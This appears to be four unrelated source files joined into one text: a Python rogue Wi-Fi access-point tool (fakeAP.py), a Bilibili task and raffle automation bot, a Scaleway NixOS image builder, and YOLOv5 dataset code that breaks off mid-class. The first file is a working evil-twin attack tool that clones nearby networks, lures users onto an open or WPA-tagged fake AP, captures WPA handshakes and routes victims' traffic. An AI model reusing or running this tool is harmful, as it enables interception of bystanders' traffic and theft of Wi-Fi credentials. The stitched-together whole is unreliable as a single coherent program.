fakeAP.py | #!/usr/bin/env python
import os
from subprocess import Popen, PIPE
import time
import sys
import re
import signal
import argparse
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0
from threading import Thread, Lock
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
lock = Lock()
DN = open(os.devnull, 'w')
APs = {} # for listing APs
chan = 0 # for channel hopping Thread
count = 0 # for channel hopping Thread
forw = '0\n' # for resetting ip forwarding to original state
ap_mac = '' # for sniff's cb function
err = None # check if channel hopping is working
def parse_args():
    """Build and parse the command-line options for the fake AP."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-c", "--channel",
                        help="Choose the channel for the fake AP. Default is channel 6")
    parser.add_argument("-w", "--wpa", action="store_true",
                        help="Start the fake AP with WPA beacon tags and capture handshakes in fakeAPlog.cap file")
    parser.add_argument("-e", "--essid",
                        help="Choose the ESSID for the fake AP. Default is 'Free Wifi'. Wrap in quotes if it is more than 1 word: -e 'Free Wifi'")
    parser.add_argument("-t", "--targeting", action="store_true",
                        help="Will print a list of APs in range and allow you to copy their settings except for the encryption which by default will be open")
    return parser.parse_args()
###############
# AP TARGETING
###############
def channel_hop(mon_iface):
    """Hop the monitor interface across channels 1-12, one per second.

    Runs forever (meant for a daemon thread). On an `iw` failure, stores a
    user-facing message in the global `err`, which target_APs() displays.
    """
    global chan, err
    while 1:
        try:
            err = None
            if chan > 11:
                chan = 0
            chan = chan+1
            channel = str(chan)
            iw = Popen(['iw', 'dev', mon_iface, 'set', 'channel', channel], stdout=DN, stderr=PIPE)
            for line in iw.communicate()[1].split('\n'):
                if len(line) > 2:  # iw dev shouldnt display output unless there's an error
                    with lock:
                        err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W+'\n \
Try disconnecting the monitor mode\'s parent interface (e.g. wlan0)\n \
from the network if you have not already\n'
                    break
            time.sleep(1)
        except KeyboardInterrupt:
            sys.exit()
def target_APs():
    """Redraw the table of discovered APs (global `APs`) on a cleared
    screen, showing any channel-hopping error first."""
    os.system('clear')
    if err:
        print err
    print '['+G+'+'+W+'] Ctrl-C at any time to copy an access point from below'
    print 'num ch ESSID'
    print '---------------'
    for ap in APs:
        print G+str(ap).ljust(2)+W+' - '+APs[ap][0].ljust(2)+' - '+T+APs[ap][1]+W
def copy_AP():
    """Prompt until the user enters a valid AP number and return that AP's
    (channel, essid, mac) from the global `APs` table."""
    copy = None
    while not copy:
        try:
            copy = raw_input('\n['+G+'+'+W+'] Choose the ['+G+'num'+W+'] of the AP you wish to copy: ')
            copy = int(copy)
        except Exception:
            # Non-numeric input: ask again.
            copy = None
            continue
    channel = APs[copy][0]
    essid = APs[copy][1]
    if str(essid) == "\x00":
        # Presumably a hidden SSID (single NUL byte) — use a blank name.
        essid = ' '
    mac = APs[copy][2]
    return channel, essid, mac
def targeting_cb(pkt):
    """scapy sniff callback: record each previously unseen beacon /
    probe-response AP as [channel, essid, mac] in the global `APs` dict,
    keyed by a running counter, and redraw the table."""
    global APs, count
    if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
        try:
            # Third Dot11Elt layer — presumably the DS parameter set whose
            # info byte is the channel number; TODO confirm against scapy docs.
            ap_channel = str(ord(pkt[Dot11Elt:3].info))
        except Exception:
            return
        essid = pkt[Dot11Elt].info
        mac = pkt[Dot11].addr2
        if len(APs) > 0:
            for num in APs:
                if essid in APs[num][1]:
                    return  # already recorded
        count += 1
        APs[count] = [ap_channel, essid, mac]
        target_APs()
###################
# END AP TARGETING
###################
def get_isc_dhcp_server():
    """Ensure /usr/sbin/dhcpd exists, offering an apt-get install if it
    does not; exits when the user declines."""
    if not os.path.isfile('/usr/sbin/dhcpd'):
        install = raw_input('['+T+'*'+W+'] isc-dhcp-server not found in /usr/sbin/dhcpd, install now? [y/n] ')
        if install == 'y':
            os.system('apt-get -y install isc-dhcp-server')
        else:
            sys.exit('['+R+'-'+W+'] isc-dhcp-server not found in /usr/sbin/dhcpd')
def iwconfig():
    """Parse `iwconfig` output.

    Returns (monitors, interfaces): monitor-mode interface names, and a
    dict mapping each 802.11 interface to 1 if it is associated to an
    ESSID, else 0.
    """
    monitors = []
    interfaces = {}
    proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
    for row in proc.communicate()[0].split('\n'):
        if not row:
            continue
        if row.startswith(' '):
            continue  # continuation line of the previous interface
        name = row[:row.find(' ')]
        if 'Mode:Monitor' in row:
            monitors.append(name)
        elif 'IEEE 802.11' in row:
            interfaces[name] = 1 if "ESSID:\"" in row else 0
    return monitors, interfaces
def rm_mon():
    """Tear down every monitor-mode interface, returning it to managed mode."""
    monitors, interfaces = iwconfig()
    for m in monitors:
        if 'mon' in m:
            # airmon-ng created this virtual interface; let it remove it.
            Popen(['airmon-ng', 'stop', m], stdout=DN, stderr=DN)
        else:
            Popen(['ifconfig', m, 'down'], stdout=DN, stderr=DN)
            Popen(['iw', 'dev', m, 'mode', 'managed'], stdout=DN, stderr=DN)
            Popen(['ifconfig', m, 'up'], stdout=DN, stderr=DN)
def internet_info(interfaces):
    '''Return (iface, ipprefix) for the internet-connected interface.

    ipprefix is the first two characters of the default gateway address
    (e.g. '19', '17', '10') and is later used by dhcp_conf() to pick a
    non-colliding AP subnet. Exits if no default route exists.
    '''
    inet_iface = None
    proc = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
    def_route = proc.communicate()[0].split('\n')
    for line in def_route:
        if 'default via' in line:
            line = line.split()
            inet_iface = line[4]
            ipprefix = line[2][:2]  # Just checking if it's 192, 172, or 10
    if inet_iface:
        return inet_iface, ipprefix
    else:
        sys.exit('['+R+'-'+W+'] No active internet connection found. Exiting')
def AP_iface(interfaces, inet_iface):
    """Return the first wireless interface that is not the internet-facing
    one, or None if every interface is the internet interface."""
    for candidate in interfaces:
        if candidate != inet_iface:
            return candidate
def iptables(inet_iface):
    """Flush iptables, enable NAT masquerading out of inet_iface, and turn
    on IP forwarding.

    Returns the previous ip_forward value (also stored in the global
    `forw`) so cleanup() can restore it.
    """
    global forw
    os.system('iptables -X')
    os.system('iptables -F')
    os.system('iptables -t nat -F')
    os.system('iptables -t nat -X')
    os.system('iptables -t nat -A POSTROUTING -o %s -j MASQUERADE' % inet_iface)
    with open('/proc/sys/net/ipv4/ip_forward', 'r+') as ipf:
        forw = ipf.read()
        ipf.write('1\n')
    return forw
def start_monitor(ap_iface, channel):
    """Put ap_iface into monitor mode via airmon-ng and return the new
    monitor interface name.

    NOTE(review): if airmon-ng prints no "monitor mode enabled" line this
    implicitly returns None, and callers do not check for that.
    """
    proc = Popen(['airmon-ng', 'start', ap_iface, channel], stdout=PIPE, stderr=DN)
    for line in proc.communicate()[0].split('\n'):
        if "monitor mode enabled" in line:
            line = line.split()
            # Fifth token holds the interface name followed by ')'.
            mon_iface = line[4][:-1]
            return mon_iface
def get_mon_mac(mon_iface):
    '''Return the MAC address of mon_iface as "aa:bb:cc:dd:ee:ff".

    Uses the SIOCGIFHWADDR ioctl (0x8927); see
    http://stackoverflow.com/questions/159137/getting-mac-address

    Fix: the query socket is now always closed instead of leaking.
    '''
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
    finally:
        s.close()
    mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
    return mac
def start_ap(mon_iface, channel, essid, args):
    """Launch airbase-ng (WPA-tagged and logging handshakes when --wpa)
    and bring up its at0 tap interface as the AP gateway.

    NOTE(review): at0 is always given 10.0.0.1 here even when dhcp_conf()
    selected the 172.16.0.0/24 subnet — looks inconsistent; confirm.
    """
    print '['+T+'*'+W+'] Starting the fake access point...'
    if args.wpa:
        Popen(['airbase-ng', '-P', '-Z', '4', '-W', '1', '-c', channel, '-e', essid, '-v', mon_iface, '-F', 'fakeAPlog'], stdout=DN, stderr=DN)
    else:
        Popen(['airbase-ng', '-c', channel, '-e', essid, '-v', mon_iface], stdout=DN, stderr=DN)
    try:
        time.sleep(6)  # Copied from Pwnstar which said it was necessary?
    except KeyboardInterrupt:
        cleanup(None, None)
    Popen(['ifconfig', 'at0', 'up', '10.0.0.1', 'netmask', '255.255.255.0'], stdout=DN, stderr=DN)
    Popen(['ifconfig', 'at0', 'mtu', '1400'], stdout=DN, stderr=DN)
def sniffing(interface, cb):
    '''Blocking scapy sniff loop on `interface`, dispatching each packet
    to `cb` without storing it.

    This exists for if/when I get deauth working
    so that it's easy to call sniff() in a thread.'''
    sniff(iface=interface, prn=cb, store=0)
def dhcp_conf(ipprefix):
    """Write an isc-dhcp-server config to /tmp/dhcpd.conf and return its path.

    The AP subnet avoids colliding with the upstream LAN: when the gateway
    prefix is '10' the AP hands out 172.16.0.x, otherwise (192.x, 172.x,
    or anything else) it hands out 10.0.0.x.

    Fix: an unrecognised prefix previously wrote no file at all yet still
    returned the path (possibly stale or nonexistent); it now falls back
    to the 10.0.0.0/24 subnet.
    """
    config = ('default-lease-time 300;\n'
              'max-lease-time 360;\n'
              'ddns-update-style none;\n'
              'authoritative;\n'
              'log-facility local7;\n'
              'subnet %s netmask 255.255.255.0 {\n'
              'range %s;\n'
              'option routers %s;\n'
              'option domain-name-servers %s;\n'
              '}')
    if ipprefix == '10':
        # Upstream LAN is 10.x — hand out 172.16.0.x instead.
        values = ('172.16.0.0', '172.16.0.2 172.16.0.100', '172.16.0.1', '8.8.8.8')
    else:
        # subnet, range, router, dns
        values = ('10.0.0.0', '10.0.0.2 10.0.0.100', '10.0.0.1', '8.8.8.8')
    with open('/tmp/dhcpd.conf', 'w') as dhcpconf:
        dhcpconf.write(config % values)
    return '/tmp/dhcpd.conf'
def dhcp(dhcpconf, ipprefix):
    """Clear old leases, launch dhcpd with the given config, and add a
    route for whichever AP subnet dhcp_conf() selected."""
    os.system('echo > /var/lib/dhcp/dhcpd.leases')
    # NOTE(review): local name shadows this function; harmless but confusing.
    dhcp = Popen(['dhcpd', '-cf', dhcpconf], stdout=PIPE, stderr=DN)
    if ipprefix == '19' or ipprefix == '17':
        os.system('route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1')
    else:
        os.system('route add -net 172.16.0.0 netmask 255.255.255.0 gw 172.16.0.1')
def mon_mac(mon_iface):
    '''
    Return the MAC address of mon_iface via the SIOCGIFHWADDR ioctl.
    http://stackoverflow.com/questions/159137/getting-mac-address

    NOTE(review): exact duplicate of get_mon_mac() above and appears
    unused in this file — candidate for removal once callers are confirmed.
    '''
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
    mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
    return mac
def cleanup(signal, frame):
    """SIGINT handler: restore ip_forward, flush iptables, kill the AP
    daemons, restore the interfaces, then exit."""
    with open('/proc/sys/net/ipv4/ip_forward', 'r+') as forward:
        forward.write(forw)  # value saved by iptables()
    os.system('iptables -F')
    os.system('iptables -X')
    os.system('iptables -t nat -F')
    os.system('iptables -t nat -X')
    os.system('pkill airbase-ng')
    os.system('pkill dhcpd')  # Dangerous?
    rm_mon()
    sys.exit('\n['+G+'+'+W+'] Cleaned up')
def main(args):
    """Entry point: set up NAT + DHCP, optionally clone a targeted AP,
    start the fake AP, then loop printing DHCP leases until Ctrl-C
    triggers cleanup()."""
    global ipf, mon_iface, ap_mac
    if os.geteuid() != 0:
        sys.exit('['+R+'-'+W+'] Run as root')
    get_isc_dhcp_server()
    # Defaults, overridable from the command line.
    channel = '1'
    if args.channel:
        channel = args.channel
    essid = 'Free Wifi'
    if args.essid:
        essid = args.essid
    monitors, interfaces = iwconfig()
    rm_mon()
    inet_iface, ipprefix = internet_info(interfaces)
    ap_iface = AP_iface(interfaces, inet_iface)
    if not ap_iface:
        sys.exit('['+R+'-'+W+'] Found internet connected interface in '+T+inet_iface+W+'. Please bring up a wireless interface to use as the fake access point.')
    ipf = iptables(inet_iface)
    print '['+T+'*'+W+'] Cleared leases, started DHCP, set up iptables'
    mon_iface = start_monitor(ap_iface, channel)
    mon_mac1 = get_mon_mac(mon_iface)
    if args.targeting:
        # Channel-hop and sniff until the user Ctrl-C's out of sniffing(),
        # then clone the chosen AP's channel/essid/mac.
        hop = Thread(target=channel_hop, args=(mon_iface,))
        hop.daemon = True
        hop.start()
        sniffing(mon_iface, targeting_cb)
        channel, essid, ap_mac = copy_AP()
    start_ap(mon_iface, channel, essid, args)
    dhcpconf = dhcp_conf(ipprefix)
    dhcp(dhcpconf, ipprefix)
    # Status loop; SIGINT is routed to cleanup().
    while 1:
        signal.signal(signal.SIGINT, cleanup)
        os.system('clear')
        print '['+T+'*'+W+'] '+T+essid+W+' set up on channel '+T+channel+W+' via '+T+mon_iface+W+' on '+T+ap_iface+W
        print '\nDHCP leases log file:'
        proc = Popen(['cat', '/var/lib/dhcp/dhcpd.leases'], stdout=PIPE, stderr=DN)
        for line in proc.communicate()[0].split('\n'):
            print line
        time.sleep(1)
main(parse_args())
|
run.py | import sys
import signal
import threading
import asyncio
import aiohttp
import conf_loader
import notifier
import bili_sched
import printer
import bili_statistics
from console_cmd import ConsoleCmd
from tasks.login import LoginTask
from tasks.live_daily_job import (
HeartBeatTask,
OpenSilverBoxTask,
RecvDailyBagTask,
SignTask,
WatchTvTask,
SignFansGroupsTask,
SendGiftTask,
ExchangeSilverCoinTask
)
from tasks.main_daily_job import (
JudgeCaseTask,
BiliMainTask,
DahuiyuanTask
)
from tasks.manga_daily_job import (
ShareComicTask,
MangaSignTask,
)
from tasks.utils import UtilsTask
# 弹幕
from danmu.bili_danmu_monitor import DanmuPrinter, DanmuRaffleMonitor
from danmu.yj_monitor import TcpYjMonitorClient
from danmu import raffle_handler
# 实物抽奖
from substance.monitor_substance_raffle import SubstanceRaffleMonitor
from dyn.monitor_dyn_raffle import DynRaffleMonitor
loop = asyncio.get_event_loop()

# Load user credentials and every configuration table once at startup.
dict_user = conf_loader.read_user()
dict_bili = conf_loader.read_bili()
dict_bilitv = conf_loader.read_bilitv()
dict_color = conf_loader.read_color()
dict_ctrl = conf_loader.read_ctrl()
dict_task = conf_loader.read_task()
printer.init_config(dict_color, dict_ctrl['print_control']['danmu'])
############################################################################
############################################################################
# 👇users 录入程序
async def init_users():
    """Register every configured user with the notifier.

    Reads the global/custom task control and arrangement tables from the
    task config and adds one user per entry in dict_user['users'].
    """
    global_task_control = dict_task['global_task_control']
    custom_task_control = dict_task['custom_task_control']
    global_task_arrangement = dict_task['global_task_arrangement']
    custom_task_arrangement = dict_task['custom_task_arrangement']
    users = notifier.Users(global_task_control=global_task_control,
                           global_task_arrangement=global_task_arrangement,
                           dict_bili=dict_bili,
                           dict_bilitv = dict_bilitv,
                           force_sleep=bili_sched.force_sleep)
    notifier.init(users=users)
    assert dict_user['users']  # a truthy list means at least one user is configured
    for user_info in dict_user['users']:
        username = user_info['username']
        await notifier.add_user(user_info=user_info,
                                custom_task_control=custom_task_control.get(username, {}),
                                custom_task_arrangement=custom_task_arrangement.get(username, {}))
loop.run_until_complete(init_users())
############################################################################
############################################################################
# 👇重复任务录入程序
# 时间间隔为小时,同时每次休眠结束都会计时归零,重新从当前时间计算时间间隔
# 下面表示每隔多少小时执行一次
def add_daily_jobs():
    """Register every recurring task with its repeat interval in hours.

    Each interval timer resets to zero whenever a scheduled sleep ends,
    so a value of N means "at most once every N awake hours".
    """
    schedule = (
        (HeartBeatTask, 6),
        (OpenSilverBoxTask, 6),
        (RecvDailyBagTask, 3),
        (SignTask, 6),
        (WatchTvTask, 6),
        (SignFansGroupsTask, 6),
        (SendGiftTask, 2),
        (ExchangeSilverCoinTask, 6),
        (JudgeCaseTask, 0.75),
        (BiliMainTask, 4),
        (MangaSignTask, 6),
        (ShareComicTask, 6),
        (DahuiyuanTask, 6),
    )
    for task, hours in schedule:
        bili_sched.add_daily_jobs(task, every_hours=hours)
add_daily_jobs()
############################################################################
############################################################################
# Log every user in, then fetch the list of live areas to monitor.
loop.run_until_complete(notifier.exec_task(LoginTask))
other_control = dict_ctrl['other_control']
area_ids = loop.run_until_complete(notifier.exec_func(UtilsTask.fetch_blive_areas))
area_duplicated = other_control['area_duplicated']
if area_duplicated:
    area_ids *= 2  # presumably doubles coverage per area — confirm intent
bili_statistics.init(area_num=len(area_ids), area_duplicated=area_duplicated)
default_roomid = other_control['default_monitor_roomid']
############################################################################
############################################################################
# 👇录入 monitors
# aiohttp sb session
async def init_monitors():
    """Build the danmu printer and every enabled monitor on one shared session."""
    http_session = aiohttp.ClientSession()
    # Danmu printing for the default room; area_id -1 marks it as non-raffle.
    printer = DanmuPrinter(
        room_id=default_roomid,
        area_id=-1,
        session=http_session)
    # One danmu raffle monitor per live area.
    collected = [
        DanmuRaffleMonitor(room_id=0, area_id=one_area, session=http_session)
        for one_area in area_ids
    ]
    # Optional yjmonitor TCP client, enabled only when a key is configured.
    tcp_addr = other_control['yjmonitor_tcp_addr']
    tcp_key = other_control['yjmonitor_tcp_key']
    if tcp_key:
        collected.append(TcpYjMonitorClient(
            key=tcp_key,
            url=tcp_addr,
            area_id=0))
    if other_control['substance_raffle']:
        collected.append(SubstanceRaffleMonitor())
    if other_control['dyn_raffle']:
        collected.append(DynRaffleMonitor(
            should_join_immediately=other_control['join_dyn_raffle_at_once']))
    return printer, collected
danmu_printer, monitors = loop.run_until_complete(init_monitors())
############################################################################
############################################################################
bili_sched.init(monitors=monitors, sleep_ranges=dict_ctrl['other_control']['sleep_ranges'])
# Initialize the interactive console. Started only when SIGHUP handling
# suggests an attached terminal: non-Linux, or Linux with the default handler.
if sys.platform != 'linux' or signal.getsignal(signal.SIGHUP) == signal.SIG_DFL:
    console_thread = threading.Thread(
        target=ConsoleCmd(loop, default_roomid, danmu_printer).cmdloop)
    console_thread.start()
else:
    console_thread = None
# Coroutines for every monitor plus the scheduler / raffle / printer loops.
tasks = [monitor.run() for monitor in monitors]
other_tasks = [
    bili_sched.run(),
    raffle_handler.run(),
    danmu_printer.run()
]
# NOTE(review): other_tasks is always non-empty here, so this branch always
# runs and run_forever() is only reached after asyncio.wait returns — confirm
# whether run_forever() is intended as a fallback.
if other_tasks:
    loop.run_until_complete(asyncio.wait(tasks + other_tasks))
loop.run_forever()
if console_thread is not None:
    console_thread.join()
|
make-nixos-image.py | #!/usr/bin/env python3
import argparse
import datetime
import logging
import os
import pathlib
import queue
import re
import threading
import time
import paramiko
import scaleway.apis
import tenacity
logger = logging.getLogger(__name__)
def get_minimal_ubuntu(all_images, region, instance_type):
    """Return the ID of the newest base-Ubuntu local image that is compatible
    with *instance_type* in *region*.

    Raises Exception when no compatible image exists.
    """
    # Likely "base Ubuntu" marketplace entries, newest creation date first so
    # the latest major release wins.
    candidates = sorted(
        (img for img in all_images
         if "ubuntu" in img["name"].lower() and "distribution" in img["categories"]),
        key=lambda img: img["creation_date"],
        reverse=True,
    )
    for img in candidates:
        for version in img["versions"]:
            # Only the currently published version of each image counts.
            if version["id"] != img["current_public_version"]:
                continue
            for local in version["local_images"]:
                # HACK: backcompat region format (e.g. par1 from fr-par-1)
                zone_ok = local["zone"] in [region, "".join(region.split("-")[-2:])]
                if instance_type in local["compatible_commercial_types"] and zone_ok:
                    return local["id"]
    raise Exception("Image not found")
@tenacity.retry(stop=tenacity.stop_after_attempt(30))
def ssh_connect(ip_address, private_key):
    """Open an SSH session as root on *ip_address*, retrying while sshd boots.

    Retries up to 30 times because connect() raises until the freshly
    powered-on instance starts accepting connections.
    """
    client = paramiko.SSHClient()
    # The new host's key is unknown; accept it on first use.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
    client.connect(hostname=ip_address, username="root", pkey=private_key, timeout=5)
    return client
def read_lines(streams):
    """Yield lines from several streams, interleaved in arrival order.

    Each stream is drained on its own daemon thread; iteration ends once
    every stream is exhausted and the queue is empty.
    """
    lines = queue.Queue()

    def pump(stream):
        # Worker thread: forward every line into the shared queue.
        for line in stream:
            lines.put(line)

    workers = [
        threading.Thread(target=pump, args=(stream,), daemon=True)
        for stream in streams
    ]
    for worker in workers:
        worker.start()
    while True:
        try:
            yield lines.get(timeout=0.01)
        except queue.Empty:
            # Only stop after all producers are done AND the queue is drained;
            # a successful get above handles any stragglers.
            if not any(worker.is_alive() for worker in workers):
                return
def flatten_whitespace(lines):
    """Collapse whitespace runs to single spaces, strip each line, and drop
    lines that end up empty.

    Fix: the pattern must be a raw string — "\\s" in a plain literal is an
    invalid escape sequence (SyntaxWarning on modern Python).
    """
    yield from filter(None, (re.sub(r"\s+", " ", line).strip() for line in lines))
def get_args(argv=None):
    """Parse command-line arguments.

    --secret-key defaults to the SCW_SECRET_KEY environment variable and is
    only mandatory when that variable is absent.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--secret-key",
        required=("SCW_SECRET_KEY" not in os.environ),
        **(
            {"default": os.environ["SCW_SECRET_KEY"]}
            if "SCW_SECRET_KEY" in os.environ
            else {}
        ),
    )
    parser.add_argument("--region", default="fr-par-1")
    parser.add_argument("--instance-type", default="DEV1-M")
    # Fix: type=int is required — without it a CLI-supplied value arrives as a
    # string, and `1_000_000_000 * args.bootstrap_disk_size` in main() would be
    # string repetition instead of a byte count.
    parser.add_argument("--bootstrap-disk-size", type=int, default=20)
    return parser.parse_args(argv)
def main(argv=None):
    """Build a NixOS disk image on Scaleway.

    Boots a throwaway Ubuntu instance, runs the bootstrap script on it over
    SSH to install NixOS onto a second volume, snapshots that volume, turns
    the snapshot into an image, and terminates the builder instance.
    """
    args = get_args(argv)
    logging.basicConfig(
        level=logging.INFO,
        format="%(asctime)s.%(msecs)03d :: [%(levelname)s] %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )
    # Three Scaleway API clients: account, marketplace (public images), compute.
    account = scaleway.apis.AccountAPI(auth_token=args.secret_key)
    marketplace = scaleway.apis.API(base_url="https://api-marketplace.scaleway.com/")
    compute = scaleway.apis.ComputeAPI(
        auth_token=args.secret_key, base_url="https://api.scaleway.com/"
    )
    # Uses the first organization of the token's account.
    organization_id = account.query().organizations.get()["organizations"][0]["id"]
    logger.info("Using organization ID %s", organization_id)
    image_id = get_minimal_ubuntu(
        marketplace.query().images.get()["images"], args.region, args.instance_type
    )
    logger.info("Using bootstrap (Ubuntu) image ID %s", image_id)
    # Ephemeral keypair for this run; the public half is injected via tags.
    private_key = paramiko.ECDSAKey.generate(bits=256)
    server = (
        compute.query()
        .instance.v1.zones(args.region)
        .servers.post(
            {
                "organization": organization_id,
                "name": "nixos-image-builder",
                "image": image_id,
                "commercial_type": args.instance_type,
                "volumes": {
                    # Volume 0: Ubuntu bootstrap root disk.
                    "0": {"size": 1_000_000_000 * args.bootstrap_disk_size},
                    # Volume 1: target disk that becomes the NixOS image.
                    "1": {
                        "name": "nixos-volume",
                        "organization": organization_id,
                        "volume_type": "l_ssd",
                        "size": 20_000_000_000,
                    },
                },
                "boot_type": "local",
                # AUTHORIZED_KEY tag format: spaces replaced by underscores.
                "tags": [
                    "AUTHORIZED_KEY="
                    + private_key.get_name()
                    + "_"
                    + private_key.get_base64()
                ],
            }
        )["server"]
    )
    logger.info("Provisioned instance %s", server["id"])
    logger.info("Starting instance, this may take a bit...")
    # NOTE(review): the response of the poweron action is unused.
    response = (
        compute.query()
        .instance.v1.zones(args.region)
        .servers(server["id"])
        .action.post({"action": "poweron"})
    )
    # Poll until the instance reports "running".
    while True:
        server = (
            compute.query()
            .instance.v1.zones(args.region)
            .servers(server["id"])
            .get()["server"]
        )
        if server["state"] == "running":
            break
        time.sleep(1)
    logger.info("Instance running")
    logger.info("Attempting to SSH to root@%s", server["public_ip"]["address"])
    client = ssh_connect(server["public_ip"]["address"], private_key)
    logger.info("Copying bootstrap files")
    # Upload everything under ./bootstrap into the instance's /tmp.
    sftp = client.open_sftp()
    bootstrap_file_path = pathlib.Path(__file__).parent / "bootstrap"
    for bootstrap_file in bootstrap_file_path.glob("*"):
        filename = bootstrap_file.relative_to(bootstrap_file_path)
        source = str(bootstrap_file.resolve())
        destination = str(pathlib.PurePosixPath("/tmp") / filename)
        sftp.put(source, destination)
    logger.info("Executing NixOS bootstrap")
    _, stdout, stderr = client.exec_command("bash /tmp/nix-bootstrap.sh")
    # Stream stdout+stderr interleaved while the script runs.
    for line in flatten_whitespace(read_lines((stdout, stderr))):
        logger.info(line)
    status = stdout.channel.recv_exit_status()
    logger.info("Bootstrap exited with status %d", status)
    # -1 is tolerated: presumably the channel closes when the script powers
    # the instance down — TODO confirm.
    if status not in (-1, 0):
        raise Exception("Failed to bootstrap")
    logger.info("Waiting for instance to stop...")
    # The bootstrap script shuts the machine down; wait for that state.
    while True:
        server = (
            compute.query()
            .instance.v1.zones(args.region)
            .servers(server["id"])
            .get()["server"]
        )
        if server["state"] == "stopped in place":
            break
        time.sleep(1)
    image_name = (
        "nixos-" + datetime.datetime.utcnow().replace(microsecond=0).isoformat()
    )
    # Snapshot the NixOS volume (volume "1") while the instance is stopped.
    snapshot = (
        compute.query()
        .instance.v1.zones(args.region)
        .snapshots.post(
            {
                "volume_id": server["volumes"]["1"]["id"],
                "organization": organization_id,
                "name": image_name,
            }
        )["snapshot"]
    )
    logger.info("Created snapshot ID %s", snapshot["id"])
    logger.info("Waiting for snapshot to become available")
    while True:
        snapshot = (
            compute.query()
            .instance.v1.zones(args.region)
            .snapshots(snapshot["id"])
            .get()["snapshot"]
        )
        if snapshot["state"] == "available":
            break
        time.sleep(1)
    # Promote the snapshot to a bootable image.
    image = (
        compute.query()
        .instance.v1.zones(args.region)
        .images.post(
            {
                "name": image_name,
                "root_volume": snapshot["id"],
                "arch": server["arch"],
                "organization": organization_id,
            }
        )["image"]
    )
    logger.info("Created NixOS image ID %s", image["id"])
    logger.info("Deleting server ID %s", server["id"])
    compute.query().instance.v1.zones(args.region).servers(server["id"]).action.post(
        {"action": "terminate"}
    )
    logger.info("Done")
if __name__ == "__main__":
    main()
|
datasets.py | # Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp']  # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv']  # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag. After this loop the module-global `orientation`
# holds the numeric EXIF tag id for 'Orientation'; exif_size() reads it.
for orientation in ExifTags.TAGS.keys():
    if ExifTags.TAGS[orientation] == 'Orientation':
        break
def get_hash(files):
    """Return a cheap aggregate fingerprint for *files*: the summed byte size
    of every path that exists as a regular file."""
    total = 0
    for path in files:
        if os.path.isfile(path):
            total += os.path.getsize(path)
    return total
def exif_size(img):
    """Return the EXIF-orientation-corrected PIL image size (width, height).

    Falls back to the raw ``img.size`` when EXIF data is absent or unreadable.
    """
    s = img.size  # (width, height)
    try:
        # `orientation` is the module-global EXIF tag id resolved at import time.
        rotation = dict(img._getexif().items())[orientation]
        if rotation == 6:  # rotation 270
            s = (s[1], s[0])
        elif rotation == 8:  # rotation 90
            s = (s[1], s[0])
    except Exception:
        # Fix: was a bare `except:`, which also swallows SystemExit and
        # KeyboardInterrupt. Missing/odd EXIF is expected; ignore only
        # ordinary errors.
        pass
    return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
                      rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
    """Build a LoadImagesAndLabels dataset and a matching dataloader.

    Returns (dataloader, dataset). With rank != -1 a DistributedSampler is
    attached; with image_weights the plain torch DataLoader is used so the
    dataset's weights can change between epochs.
    """
    # Make sure only the first process in DDP process the dataset first, and the following others can use the cache
    with torch_distributed_zero_first(rank):
        dataset = LoadImagesAndLabels(path, imgsz, batch_size,
                                      augment=augment,  # augment images
                                      hyp=hyp,  # augmentation hyperparameters
                                      rect=rect,  # rectangular training
                                      cache_images=cache,
                                      single_cls=opt.single_cls,
                                      stride=int(stride),
                                      pad=pad,
                                      image_weights=image_weights,
                                      prefix=prefix)

    batch_size = min(batch_size, len(dataset))
    # Worker count bounded by CPUs per DDP process, batch size, and the cap.
    nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers])  # number of workers
    sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
    loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
    # Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
    dataloader = loader(dataset,
                        batch_size=batch_size,
                        num_workers=nw,
                        sampler=sampler,
                        pin_memory=True,
                        collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
    return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
    """ Dataloader that reuses workers

    Uses same syntax as vanilla DataLoader
    """

    def __init__(self, *args, **kwargs):
